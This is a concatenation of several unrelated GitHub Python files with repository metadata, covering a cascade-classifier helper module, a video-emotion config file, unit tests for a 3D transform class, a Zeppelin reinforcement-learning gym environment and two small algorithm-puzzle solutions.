XYCurrTrn[:,-1]\n indList = []\n \n for i in range(len(yRes)):\n if yRes[i] == 1 and yLabel[i]==0:\n indList.append(i)\n \n N = XYCurrTrn[indList,:]\n P 
= XYCurrTrn[np.where(XYCurrTrn[:,-1]==1)[0],:]\n\n XYTrn = np.vstack((P,N))\n\n return XYTrn\n \n\n\ndef update_trnset_with_FP_true_samples(XYCurrTrn, yRes):\n yLabel = XYCurrTrn[:,-1]\n indList = []\n \n for i in range(len(yRes)):\n if yRes[i] == 1 and yLabel[i]==0:\n indList.append(i)\n \n N = XYCurrTrn[indList,:]\n P = XYCurrTrn[np.where(XYCurrTrn[:,-1]==1)[0],:]\n\n XYTrn = np.vstack((P,N))\n\n return XYTrn\n \n\n\ndef update_index_trnset_with_FP_true_samples(XYCurrTrn, yRes):\n yLabel = XYCurrTrn[:,-1]\n FP_ind_list = []\n \n for i in range(len(yRes)):\n if yRes[i] == 1 and yLabel[i]==0:\n FP_ind_list.append(i)\n \n index = FP_ind_list + np.where(XYCurrTrn[:,-1]==1)\n\n return index\n \n\n\ndef update_XY_with_FP_P_samples(XYPosTrn, yRes, XYTestNFeat):\n yLabel = XYTestNFeat[:,-1]\n indList = []\n\n for i in range(len(yRes)):\n if yRes[i] == 1 and yLabel[i]==0:\n indList.append(i)\n print(indList)\n N = XYTest[indList,:]\n N_stage0 = N\n\n P = XYPosTrn\n XYTrn = np.vstack((P,N))\n\n print(len(XYTrn))\n\n return XYTrn\n\n\ndef update_XY_with_N_feats(XYTrn, featList, nFeats):\n# select first n features in featList for training set\n feats = featList[:nFeats]\n XYTrn_nfeats = np.hstack((XYTrn[:,feats], XYTrn[:,-1].reshape([-1,1])))\n\n return XYTrn_nfeats\n\n\n# SHOULE BE REMOVED, REPLACED BY update_XY_with_N_feats\ndef XYTrnUpdateWithTopNFeats(XYTrn, featList, nFeats):\n# select first n features in featList for training set\n feats = featList[:nFeats]\n XYTrnNFeat = np.hstack((XYTrn[:,feats], XYTrn[:,-1].reshape([-1,1])))\n\n return XYTrnNFeat\n\n\n\ndef test_cascade_all_stages_keep_true_samples(XY, T_list, all_feat_list, n_feats_list, beta_list, thres_list, path_list):\n \"\"\"\n GT Positive samples P keep going through the full stages\n True negative samples are dropped out\n \"\"\"\n\n # initialization\n stages = len(T_list)\n F_list = []\n D_list = []\n\n # for-loop\n for stage in range(stages):\n # select XY with selected features to update XY\n XY_stage = update_XY_with_N_feats(XY, all_feat_list, n_feats_list[stage])\n y_res = load_strongclf_adj_thres(XY_stage, T_list[stage], thres_list[stage], path_list[stage])\n _, D, _, _, F, _, _, _, _, _ = calc_cm_rcall(XY[:,-1], y_res)\n\n # update dataset\n XY = update_trnset_with_FP_true_samples(XY, y_res)\n \n F_list.append(F)\n D_list.append(D)\n\n F_final = functools.reduce(operator.mul, F_list, 1)\n D_final = functools.reduce(operator.mul, D_list, 1)\n\n return F_list, D_list, F_final, D_final, XY\n\n\n\n\ndef test_cascade_all_stages_real_run(XY, T_list, all_feat_list, n_feats_list, beta_list, thres_list, path_list):\n \"\"\"\n All positive samples go into the next stage,\n all negative samples are dropped out\n \"\"\"\n\n # initialization\n stages = len(T_list)\n F_list = []\n D_list = []\n\n # for-loop\n for stage in range(stages):\n # select XY with selected features to update XY\n XY_stage = update_XY_with_N_feats(XY, all_feat_list, n_feats_list[stage])\n y_res = load_strongclf_adj_thres(XY_stage, T_list[stage], thres_list[stage], path_list[stage])\n _, D, _, _, F, _, _, _, _, _ = calc_cm_rcall(XY[:,-1], y_res)\n\n # update dataset\n XY = update_trnset_with_P_samples(XY, y_res)\n\n F_list.append(F)\n D_list.append(D)\n\n F_final = functools.reduce(operator.mul, F_list, 1)\n D_final = functools.reduce(operator.mul, D_list, 1)\n\n return F_list, D_list, F_final, D_final, 
y_res\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"zsb87/Cascade","sub_path":"module/cascade_func.py","file_name":"cascade_func.py","file_ext":"py","file_size_in_byte":15323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"5253511196","text":"RESOURCES_PATH = \"Resources/\"\nPATH_TO_VIDEO = \"\"\nPATH_TO_MODEL = RESOURCES_PATH + \"haarcascade_frontalface_default.xml\"\nPATH_TO_EMODEL = RESOURCES_PATH + \"datasets/Models/FINAL\"\nSOURCE = \"VIDEO\"\nJSON_PATH_PRE = \"jsonFiles/PreProcessResults.json\"\nJSON_PATH_POS = \"jsonFiles/PostProcessResults.json\"\nJSON_PATH_TEMP = \"jsonFiles/PreviewTMP.json\"\nPATH_TO_JSON_PRE = RESOURCES_PATH + JSON_PATH_PRE\nPATH_TO_JSON_POS = RESOURCES_PATH + JSON_PATH_POS\nPATH_TO_JSON_TEMP = RESOURCES_PATH + JSON_PATH_TEMP\nVIDEO_PREVIEW_POS = True\nVIDEO_PREVIEW_PRE = True\nDATA_DIRECTORY = RESOURCES_PATH + \"datasets/train\"\nMODEL_DIRECTORY = RESOURCES_PATH + \"datasets/Models\"\nEMOTION_MODEL = MODEL_DIRECTORY + \"/AIWakeModel.h5\"\nIMG_SIZE_PROC = 224 #Imagenet -> 224x224 FER-2013\nVIDEO_LENGHT = 0\nRATIO = 0.4\nPROP = 0.25\nDETAILED = True\nSHOW_HB = True\nTHREAD_POOL_SIZE = 4\nLOG = \"\"\nIMG_KEY = \"\"\nSELECTED_FACE = -1\nPROCESSED_FACES = 0\nSELECTED_FRAME = -1\nVIDEO_SPEED = 1\nSELECTED_SPEED = 1\n","repo_name":"Kirkuss/TFG","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"29564066085","text":"import numpy as np\nimport pytest\nfrom quaternion import quaternion\n\nfrom tensorbay.geometry import Transform3D, Vector3D\n\n_DATA_TRANSFORM = {\n \"translation\": {\"x\": 1.0, \"y\": 2.0, \"z\": 3.0},\n \"rotation\": {\"w\": 1.0, \"x\": 0.0, \"y\": 0.0, \"z\": 0.0},\n}\n\n\nclass TestTransform3D:\n def test_init(self):\n sequence = [[1, 0, 0, 1], [0, 1, 0, 1]]\n with pytest.raises(ValueError):\n Transform3D(matrix=sequence)\n\n transform = Transform3D()\n assert transform.translation == Vector3D(0.0, 0.0, 0.0)\n assert transform.rotation == quaternion(1.0, 0.0, 0.0, 0.0)\n\n sequence = [[1, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]\n transform = Transform3D(matrix=sequence)\n assert transform.translation == Vector3D(1, 1, 1)\n assert transform.rotation == quaternion(1.0, -0.0, -0.0, -0.0)\n\n numpy = np.array(sequence)\n transform = Transform3D(matrix=numpy)\n assert transform.translation == Vector3D(1, 1, 1)\n assert transform.rotation == quaternion(1.0, -0.0, -0.0, -0.0)\n\n transform = Transform3D([1, 2, 3], [1, 0, 0, 0])\n assert transform.translation == Vector3D(1, 2, 3)\n assert transform.rotation == quaternion(1.0, 0.0, 0.0, 0.0)\n\n def test_eq(self):\n transform_1 = Transform3D([1, 2, 3], [1, 0, 0, 0])\n transform_2 = Transform3D([1, 2, 3], [1, 0, 0, 0])\n transform_3 = Transform3D([1, 1, 1], [1, 0, 0, 0])\n assert (transform_1 == transform_2) == True\n assert (transform_1 == transform_3) == False\n\n def test_mul(self):\n sequence_1 = [1, 1, 1]\n sequence_2 = [[1, 2, 3], [4, 5, 6]]\n sequence_3 = [\"a\", \"b\", \"c\"]\n quaternion_1 = quaternion(0, 1, 0, 0)\n transform_1 = Transform3D([1, 2, 3], [0, 1, 0, 0])\n transform_2 = Transform3D([2, 0, 0], [-1, 0, 0, 0])\n transform_3 = Transform3D([1, 2, 3], [-1, 0, 0, 0])\n\n assert transform_1 * transform_1 == transform_2\n assert transform_1 * quaternion_1 == transform_3\n assert transform_1 * sequence_1 == Vector3D(2.0, 1.0, 2.0)\n assert transform_1 * np.array(sequence_1) == Vector3D(2.0, 1.0, 2.0)\n\n assert transform_1.__mul__(1) == NotImplemented\n assert transform_1.__mul__(sequence_2) == NotImplemented\n assert transform_1.__mul__(np.array(sequence_2)) == NotImplemented\n assert transform_1.__mul__(sequence_3) == NotImplemented\n\n def test_rmul(self):\n quaternion_1 = quaternion(0, 1, 0, 0)\n transform_1 = Transform3D([1, 2, 3], [0, 1, 0, 0])\n transform_2 = Transform3D([1, -2, -3], [-1, 0, 0, 0])\n transform_3 = Transform3D([\"a\", \"b\", \"c\"], [-1, 0, 0, 0])\n\n with pytest.raises(TypeError):\n 1 * transform_1\n assert quaternion_1 * transform_1 == transform_2\n assert transform_3.__rmul__(quaternion_1) == NotImplemented\n\n def test_create(self):\n transform = Transform3D([1, 2, 3], [0, 1, 0, 0])\n assert Transform3D._create(Vector3D(1, 2, 3), quaternion(0, 1, 0, 0)) == transform\n\n def test_mul_vector(self):\n sequence_1 = [1, 1, 1]\n quaternion_1 = quaternion(0, 1, 0, 0)\n transform_1 = Transform3D([1, 2, 3], [0, 1, 0, 0])\n\n with pytest.raises(ValueError):\n transform_1._mul_vector(1)\n with pytest.raises(TypeError):\n transform_1._mul_vector(transform_1)\n with pytest.raises(ValueError):\n transform_1._mul_vector(quaternion_1)\n\n assert transform_1._mul_vector(sequence_1) == Vector3D(2.0, 1.0, 2.0)\n assert transform_1._mul_vector(np.array(sequence_1)) == Vector3D(2.0, 1.0, 2.0)\n\n def test_loads(self):\n transform = Transform3D.loads(_DATA_TRANSFORM)\n assert transform.translation == Vector3D(1.0, 2.0, 3.0)\n assert transform.rotation == quaternion(1.0, 0.0, 0.0, 0.0)\n\n def 
test_dumps(self):\n transform = Transform3D([1, 2, 3], [1, 0, 0, 0])\n assert transform.dumps() == _DATA_TRANSFORM\n\n def test_set_translation(self):\n transform = Transform3D()\n\n transform.set_translation(1, 2, 3)\n assert transform.translation == Vector3D(1, 2, 3)\n transform.set_translation(x=3, y=4, z=5)\n assert transform.translation == Vector3D(3, 4, 5)\n\n def test_set_rotation(self):\n transform = Transform3D()\n\n transform.set_rotation(0, 1, 0, 0)\n assert transform.rotation == quaternion(0, 1, 0, 0)\n\n quaternion_1 = quaternion(0, 1, 0, 0)\n transform.set_rotation(quaternion=quaternion_1)\n assert transform.rotation == quaternion_1\n\n with pytest.raises(TypeError):\n transform.set_rotation([0, 1, 0, 0])\n\n def test_as_matrix(self):\n matrix = np.array([[1, 0, 0, 1], [0, -1, 0, 2], [0, 0, -1, 3], [0, 0, 0, 1]])\n transform = Transform3D([1, 2, 3], [0, 1, 0, 0])\n np.testing.assert_array_equal(transform.as_matrix(), matrix)\n\n def test_inverse(self):\n transform_1 = Transform3D([1, 2, 3], [0, 1, 0, 0])\n transform_2 = Transform3D([-1, 2, 3], [0, -1, 0, 0])\n assert transform_1.inverse() == transform_2\n","repo_name":"Graviti-AI/tensorbay-python-sdk","sub_path":"tensorbay/geometry/tests/test_transform.py","file_name":"test_transform.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"2"}
+{"seq_id":"40064618274","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 17:27:36 2019\n\n@author: Thangarajan\n\"\"\"\n\ndf1 = df[['Site_Code','CarpetArea']]\ndf_grp = df1.groupby(['Site_Code'], as_index=False).mean()\ndf1.describe(include='all')\nimport pandas as pd\npd.get_dummies(df['Site_Code'])\n","repo_name":"thangarajan8/misc_python","sub_path":"sessions/untitled2.py","file_name":"untitled2.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"33375449166","text":"import logging\nimport math\nimport gym\nfrom gym import spaces\nfrom gym.utils import seeding\nimport numpy as np\nimport random\nimport polytope as pc\n\nfrom polytope.solvers import lpsolve\ndef cheby_ball(poly1):\n #logger.debug('cheby ball')\n if (poly1._chebXc is not None) and (poly1._chebR is not None):\n # In case chebyshev ball already calculated and stored\n return poly1._chebR, poly1._chebXc\n if isinstance(poly1, pc.Region):\n maxr = 0\n maxx = None\n for poly in poly1.list_poly:\n rc, xc = cheby_ball(poly)\n if rc > maxr:\n maxr = rc\n maxx = xc\n poly1._chebXc = maxx\n poly1._chebR = maxr\n return maxr, maxx\n if pc.is_empty(poly1):\n return 0, None\n # `poly1` is nonempty\n r = 0\n xc = None\n A = poly1.A\n c = np.negative(np.r_[np.zeros(np.shape(A)[1]), 1])\n norm2 = np.sqrt(np.sum(A * A, axis=1))\n G = np.c_[A, norm2]\n h = poly1.b\n sol = lpsolve(c, G, h)\n #return sol\n if sol['status'] == 0 or (sol['status'] == 4 and pc.is_inside(poly1,sol['x'][0:-1])):\n r = sol['x'][-1]\n if r < 0:\n return 0, None\n xc = sol['x'][0:-1]\n else:\n # Polytope is empty\n poly1 = pc.Polytope(fulldim=False)\n return 0, None\n poly1._chebXc = np.array(xc)\n poly1._chebR = np.double(r)\n return poly1._chebR, poly1._chebXc\n\n\nlogger = logging.getLogger(__name__)\n\nclass ZeppelinEnv(gym.Env):\n \"\"\"\n Agent is navigating a Zeppelin flying in the wind.\n The wind is composed of a wind field and a sudden turbulence.\n In particular, the agent is navigating near an obstacle which the agent must avoid.\n The goal of the agent is to leave the obstacle region.\n \"\"\"\n\n metadata = {\n 'render.modes': ['human', 'rgb_array'],\n 'video.frames_per_second' : 60\n }\n\n def is_crash(self, some_state):\n x1 = some_state[0]\n x2 = some_state[1]\n c = some_state[2]\n return (-c < x1 and x1 < c) and (-c < x2 and x2 < c)\n \n def x1_min(self, state):\n x2 = state[1]\n c = state[2]\n w = state[3]\n return -(self.TIME_STEP * (self.MAX_VELOCITY + self.MAX_TURBULENCE) + ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - (x2 - self.TIME_STEP * (self.MAX_TURBULENCE + self.MAX_VELOCITY+w))) + c) )\n\n def x1_max(self, state):\n x2 = state[1]\n c = state[2]\n w = state[3]\n return self.TIME_STEP * (self.MAX_VELOCITY + self.MAX_TURBULENCE) + ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - (x2 - self.TIME_STEP * (self.MAX_TURBULENCE + self.MAX_VELOCITY+w))) + c)\n \n def x2_max(self, state):\n c = state[2]\n w = state[3]\n return c + w / (self.MAX_VELOCITY - self.MAX_TURBULENCE) * c + self.TIME_STEP * (self.MAX_VELOCITY + self.MAX_TURBULENCE + w)\n \n def x2_min(self, state):\n c = state[2]\n return -c - self.TIME_STEP * (self.MAX_VELOCITY + self.MAX_TURBULENCE)\n\n def reached_goal(self, state):\n # Goal is to leave obstacle region, i.e. 
achieve:\n # x2 < -c2 - T * (p + r) |\n # x2 > c2 + w / (p - r) * c1 + T * (p + r + w) |\n # -x1 - T * (p + r) - ((p - r) / w * (c2 - (x2 - T * (r + p + w))) + c1) >= 0 |\n # x1 - T * (p + r) - ((p - r) / w * (c2 - (x2 - T * (r + p + w))) + c1) >= 0\n x1 = state[0]\n x2 = state[1]\n return (x2 < self.x2_min(state) ) or \\\n (x2 > self.x2_max(state) ) or \\\n ( x1 <= self.x1_min(state)) or \\\n ( x1 >= self.x1_max(state) )\n\n def __init__(self):\n # Makes the continuous fragment of the system determinitic by fixing the\n # amount of time that the ODE evolves.\n self.TIME_STEP = 0.5\n\n self.MIN_WIND_SPEED = 1.0\n self.MAX_WIND_SPEED = 30 # m/s in ~ 100 km/h\n self.MAX_TURBULENCE = 15 # m/s in ~ 54 km/h\n self.MAX_VELOCITY = 20 # m/s in ~ 72 km/h\n\n self.INCLUDE_UNWINNABLE=True\n\n self.FUEL_RESTRAINT = True\n self.REWARD_SCALE = 1e-1\n self.OBSTACLE_REWARD = -200.\n self.NO_FUEL_REWARD = -50.\n # done reward = (FUEL_RESTRAINT) ? r+fuel*r : 2*r\n self.DONE_REWARD = 100.\n self.TIME_STEP_REWARD = self.REWARD_SCALE\n\n self.MODEL_RESET_SHARE = 1.0\n self.POLYTOPES = None\n self.POLYTOPE_VOLUMES = None\n\n assert self.MAX_VELOCITY < self.MAX_TURBULENCE+self.MAX_WIND_SPEED\n assert self.MAX_TURBULENCE < self.MAX_VELOCITY\n\n self.MAX_X = 400 # m\n self.MIN_X = -400 # m\n self.MAX_Y = 400 # m\n self.MIN_Y = -400 # m\n\n self.WORST_CASE_TURBULENCE=False\n\n # self.MIN_C = 20 # m\n # self.MAX_C = 40 # m\n self.MIN_C = 10 # m\n self.MAX_C = 80 # m\n\n self.RENDER_ZEPPELIN_RADIUS=10\n \n # Action Space:\n # - Speed \\mu \\in [-1.0, 1.0]\n # - Direction y1* \\in [-1.0, 1.0]\n # y2* direction is computed implicitly through y2 = sqrt(1-y1*^2)\n # Final velocity comptued through \\mu*(y1*,y2*)\n action_low = np.array([-1.0, -1.0])\n action_high = np.array([1.0, 1.0])\n self.action_space = spaces.Box(action_low, action_high)\n\n # Observation Space:\n # - Position x1 \\in [MIN_X, MAX_X]\n # - Position x2 \\in [MIN_Y, MAX_Y]\n # - Obstacle radius c \\in [MIN_C, MAX_C]\n # - Wind strength w \\in [MIN_WIND_SPEED, MAX_WIND_SPEED]\n obs_low = np.array([\n self.MIN_X,\n self.MIN_Y,\n self.MIN_C,\n self.MIN_WIND_SPEED\n ])\n obs_high = np.array([\n self.MAX_X,\n self.MAX_Y,\n self.MAX_C,\n self.MAX_WIND_SPEED\n ])\n self.observation_space = spaces.Box(obs_low, obs_high)\n\n self._seed()\n self.viewer = None\n self.state = None\n\n self.steps_beyond_done = None\n\n def _seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def _step(self, action):\n return self._stepByModel(action)\n\n def _stepByModel(self, action):\n assert self.action_space.contains(action), \"%s (of type %s) invalid\" % (str(action), type(action))\n state = self.state\n\n # Compute turbulence\n z1 = 0.\n z2 = -1.\n if self.WORST_CASE_TURBULENCE:\n z1, z2 = self.get_worst_turbulence(self.state)\n else:\n z1_norm = self.np_random.uniform(low=-1.0, high=1.0, size=(1,))[0]\n z2_norm = np.sqrt(1-z1_norm**2)\n turbulence_strength = self.np_random.triangular(-self.MAX_TURBULENCE, 0.0 ,self.MAX_TURBULENCE, size=(1,))[0]\n z1 = z1_norm * turbulence_strength\n z2 = z2_norm * turbulence_strength\n\n x1 = state[0]\n x2 = state[1]\n c = state[2]\n w = state[3]\n\n self.steps+=1\n\n t = self.TIME_STEP\n \n y_strength = np.clip(action[0], -1.0, 1.0)*self.MAX_VELOCITY\n y1_norm = np.clip(action[1], -1.0, 1.0)\n y2_norm = np.sqrt(1.01-0.9999*y1_norm**2) # numerical safeguard against negative sqrt\n y1 = 0.999949*y1_norm * y_strength\n y2 = y2_norm * y_strength\n\n x1_new = x1 + t*( y1 + z1 )\n x2_new = x2 + t*( y2 + z2 
- w )\n \n self.state = (x1_new, x2_new, c, w)\n\n has_crashed = self.is_crash(self.state)\n reached_goal = self.reached_goal(self.state)\n done = has_crashed or reached_goal\n done = bool(done)\n\n # Imaginary fuel -> try to work as fast as possible\n fuel = 1-float(self.steps)/800.0\n\n if has_crashed:\n # Penalize for crashing\n reward = self.OBSTACLE_REWARD\n elif reached_goal:\n # Base reward + reward dependent on efficiency\n if self.FUEL_RESTRAINT:\n reward = self.DONE_REWARD + fuel*self.DONE_REWARD\n else:\n reward = 2*self.DONE_REWARD\n elif fuel == 0 and self.FUEL_RESTRAINT:\n # Do not run out of fuel\n reward = self.NO_FUEL_REWARD\n else:\n # Reward for not having crashed yet,\n # but dependent on efficiency\n reward = fuel * self.TIME_STEP_REWARD\n\n return np.array(self.state), reward, done, {'crash': has_crashed, 'goal': reached_goal}\n \n def is_in_bounds(self, state):\n w = state[3]\n c = state[2]\n x1 = state[0]\n x2 = state[1]\n intermediate_state1 = (None, None, c, w)\n if x2 < self.x2_min(intermediate_state1) or x2 > self.x2_max(intermediate_state1):\n #print(\"o\", end=\"\")\n return False\n intermediate_state2 = (None, x2, c, w)\n if x1 < self.x1_min(intermediate_state2) or x1 > self.x1_max(intermediate_state2):\n #print(\"o\", end=\"\")\n return False\n return True\n\n def random_reset(self):\n epsilon = 0.1\n w = self.np_random.uniform(low=(self.MAX_VELOCITY-self.MAX_TURBULENCE+epsilon), high=self.MAX_WIND_SPEED, size=(1,))[0]\n c = self.np_random.uniform(low=self.MIN_C, high=self.MAX_C, size=(1,))[0]\n intermediate_state1 = (None, None, c, w)\n x2 = self.np_random.uniform(low=self.x2_min(intermediate_state1), high=self.x2_max(intermediate_state1), size=(1,))[0]\n intermediate_state2 = (None, x2, c, w)\n x1 = self.np_random.uniform(low=self.x1_min(intermediate_state2), high=self.x1_max(intermediate_state2), size=(1,))[0]\n\n self.state = (x1,x2,c,w)\n \n return np.array(self.state)\n\n def exclude_because_unwinnable(self, state):\n \"\"\"\n Returns True if state should be included, because setup is unwinnable (i.e. 
inside Bermuda triangle)\n \"\"\"\n if self.INCLUDE_UNWINNABLE:\n return False\n x1 = state[0]\n x2 = state[1]\n c = state[2]\n w = state[3]\n x2_min = -c\n x2_max = (c + w / (self.MAX_VELOCITY - self.MAX_TURBULENCE) * c)\n x1_min = (- ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - x2) + c))\n x1_max = ( ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - x2) + c))\n if x1 > x1_min and x1 < x1_max and x2 > x2_min and x2 < x2_max:\n return True\n # If not above/below and not in bermuda triangle, we are out of danger\n return False\n \n def get_worst_turbulence(self, state):\n x1 = state[0]\n x2 = state[1]\n c = state[2]\n w = state[3]\n x2_min = -c\n x2_max = (c + w / (self.MAX_VELOCITY - self.MAX_TURBULENCE) * c)\n x1_min = (- ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - x2) + c))\n #x1_max = ( ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - x2) + c))\n gamma = self.MAX_TURBULENCE/np.sqrt(w**2+(self.MAX_VELOCITY - self.MAX_TURBULENCE)**2)\n if x2 <= x2_min:\n return 0., self.MAX_TURBULENCE\n elif x2 >= x2_max:\n return 0., -self.MAX_TURBULENCE\n elif x1 <= x1_min:\n return gamma*w, -gamma*(self.MAX_VELOCITY - self.MAX_TURBULENCE)\n else: # Assume x1 >= x1_max:\n return -gamma*w, -gamma*(self.MAX_VELOCITY - self.MAX_TURBULENCE)\n \n def model_reset(self):\n #print(\"m\")\n while True:\n res = self.random_reset()\n if not self.is_crash(res) and not self.reached_goal(res) and not self.exclude_because_unwinnable(res):\n rv = res\n break\n return rv\n \n def _reset(self):\n self.steps = 0\n r = self.np_random.uniform(low=0.0, high=1.0, size=(1,))[0]\n if r <= self.MODEL_RESET_SHARE:\n return self.model_reset()\n else:\n return self.polytope_reset()\n \n def init_polytopes(self, model_share, polytopes):\n self.MODEL_RESET_SHARE = model_share\n volume = []\n for p in polytopes:\n volume.append(pc.volume(p))\n total_volume = sum(volume)\n \n self.POLYTOPE_VOLUMES = [0]\n for v in volume:\n self.POLYTOPE_VOLUMES.append((self.POLYTOPE_VOLUMES[-1]*total_volume + v)/total_volume)\n self.POLYTOPES = []\n for p in polytopes:\n cheby_ball(p)\n self.POLYTOPES.append(p)\n\n def sample_from_poly(self):\n while True:\n #print(\">\", end=\"\")\n r = self.np_random.uniform(low=0.0, high=1.0, size=(1,))[0]\n poly = self.POLYTOPES[-1]\n # TODO(steuber): Could be more efficient through binary search\n for i in range(len(self.POLYTOPE_VOLUMES)):\n if r > self.POLYTOPE_VOLUMES[i]:\n poly = self.POLYTOPES[i-1]\n l_b, u_b = poly.bounding_box\n l_b = l_b.flatten()\n u_b = u_b.flatten()\n x = None\n n = poly.A.shape[1]\n for i in range(400):\n #print(\".\", end=\"\")\n x = self.np_random.uniform(low=l_b,high=u_b,size=(n,))\n if x in poly:\n break\n # Fallback if random sampling doesn't work\n if x is None:\n x = poly.chebXc\n # Fallback if polytope looks empty\n if x is None:\n continue\n return x\n \n def polytope_reset(self):\n while True:\n #print(\"|\",end=\"\")\n res = self.sample_from_poly()\n if not self.is_crash(res) and not self.reached_goal(res) and self.is_in_bounds(res) and not self.exclude_because_unwinnable(res):\n self.state = res\n rv = res\n break\n #print(\"\")\n return rv\n\n\n\n\n def _render(self, mode='human', close=False):\n if close:\n if self.viewer is not None:\n self.viewer.close()\n self.viewer = None\n return\n\n screen_width = 800\n screen_height = 800\n\n world_size_x = self.MAX_X - self.MIN_X\n world_size_y = self.MAX_Y - self.MIN_Y\n world_offset_x = -self.MIN_X\n world_offset_y = -self.MIN_Y\n scale_x = screen_width/world_size_x\n scale_y = 
screen_height/world_size_y\n from gym.envs.classic_control import rendering\n if self.viewer is None:\n self.viewer = rendering.Viewer(screen_width, screen_height)\n\n # Obstacle Circle\n obstacle = rendering.make_polygon([(-0.5,0.5),(0.5,0.5),(0.5,-0.5),(-0.5,-0.5)])\n obstacle.set_color(1.0, 0.0, 0.0)\n self.obstacletrans = rendering.Transform()\n obstacle.add_attr(self.obstacletrans)\n self.viewer.add_geom(obstacle)\n self.obstacletrans.set_translation(world_offset_x*scale_x, world_offset_y*scale_y)\n\n # Zeppelin\n zeppelin = rendering.make_circle(self.RENDER_ZEPPELIN_RADIUS*scale_x)\n zeppelin.set_color(0.0, 1.0, 1.0)\n self.zeppelintrans = rendering.Transform()\n zeppelin.add_attr(self.zeppelintrans)\n self.viewer.add_geom(zeppelin)\n\n if self.state is None: return None\n c=self.state[2]\n w=self.state[3]\n\n # Set Obstacle Size\n self.obstacletrans.set_scale(2*c*scale_x,2*c*scale_y)\n\n # Set Zeppelin Position:\n x1 = float(self.state[0]+world_offset_x) * scale_x\n x2 = float(self.state[1]+world_offset_y) * scale_y\n\n # Create Obstacle Region\n x2_1 = self.x2_min(self.state)\n x2_2 = self.x2_max(self.state)\n\n x1_11 = scale_x*self.x1_min((None,x2_1,c,w))+world_offset_x\n x1_12 = scale_x*self.x1_max((None,x2_1,c,w))+world_offset_x\n x1_21 = scale_x*self.x1_min((None,x2_2,c,w))+world_offset_x\n x1_22 = scale_x*self.x1_max((None,x2_2,c,w))+world_offset_x\n x2_1 = scale_y*x2_1+world_offset_y\n x2_2 = scale_y*x2_2+world_offset_y\n o_region = rendering.make_polygon([(x1_11,x2_1),(x1_12,x2_1),(x1_22,x2_2),(x1_21,x2_2),(x1_11,x2_1)],filled=False)\n self.viewer.add_onetime(o_region)\n\n\n self.zeppelintrans.set_translation(x1, x2)\n\n return self.viewer.render(return_rgb_array = mode=='rgb_array')\n\ngym.register(\n id='zeppelin-v3',\n entry_point=ZeppelinEnv,\n max_episode_steps=800, # todo edit\n reward_threshold=400.0, # todo edit\n )","repo_name":"samysweb/NCubeV","sub_path":"experiments/zeppelin/training/zeppelin_gym/env3.py","file_name":"env3.py","file_ext":"py","file_size_in_byte":16347,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"16171812405","text":"\nfrom collections import deque\n\n\ndef solution(n, edge):\n \n answer = 0\n edge.sort(key = lambda x:x[0])\n print(edge)\n q = deque()\n length_list = [0] * (n+1)\n graph = [[] for i in range(n+1)]\n\n print(graph)\n for e in edge: # 양방향이므로 \n graph[e[0]].append(e[1])\n graph[e[1]].append(e[0])\n print(graph)\n \n q.append(1)\n length_list[1] = 1\n\n\n while q:\n now = q.popleft()\n for idx in graph[now]:\n if length_list[idx] == 0:\n q.append(idx)\n length_list[idx] = length_list[now] + 1\n\n\n max_length = max(length_list)\n for c in length_list:\n if c == max_length:\n answer += 1\n\n\n return answer\n\n\n\n\n\n\nprint(solution(6, [[3, 6], [4, 3], [3, 2], [1, 3], [1, 2], [2, 4], [5, 2]]))\n\n# 채점을 시작합니다.\n# 정확성 테스트\n# 테스트 1 〉\t통과 (0.02ms, 10.3MB)\n# 테스트 2 〉\t통과 (0.02ms, 10.3MB)\n# 테스트 3 〉\t통과 (0.03ms, 10.3MB)\n# 테스트 4 〉\t통과 (0.25ms, 10.3MB)\n# 테스트 5 〉\t통과 (0.97ms, 10.5MB)\n# 테스트 6 〉\t통과 (2.85ms, 11MB)\n# 테스트 7 〉\t통과 (26.62ms, 16.8MB)\n# 테스트 8 〉\t통과 (38.21ms, 20.3MB)\n# 테스트 9 〉\t통과 (37.47ms, 19.9MB)\n# 채점 결과\n# 정확성: 100.0\n# 합계: 100.0 / 100.0 11","repo_name":"DoubleJONY/KDJ-algorithm-challenge","sub_path":"owen/graph/graph_p1.py","file_name":"graph_p1.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"30743464219","text":"class Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n count = [0 for _ in range(len(s) + 1)]\n count[-1] = 1\n count[-2] = 0 if s[-1] == '0' else 1\n for i in range(len(s)-2, -1, -1):\n if s[i] == '0':\n continue\n count[i] = count[i+1] + count[i+2] if int(s[i:i+2])<27 else count[i+1]\n return count[0]\n","repo_name":"ShengYg/algorithms","sub_path":"Leetcode/091 Decode Ways.py","file_name":"091 Decode Ways.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
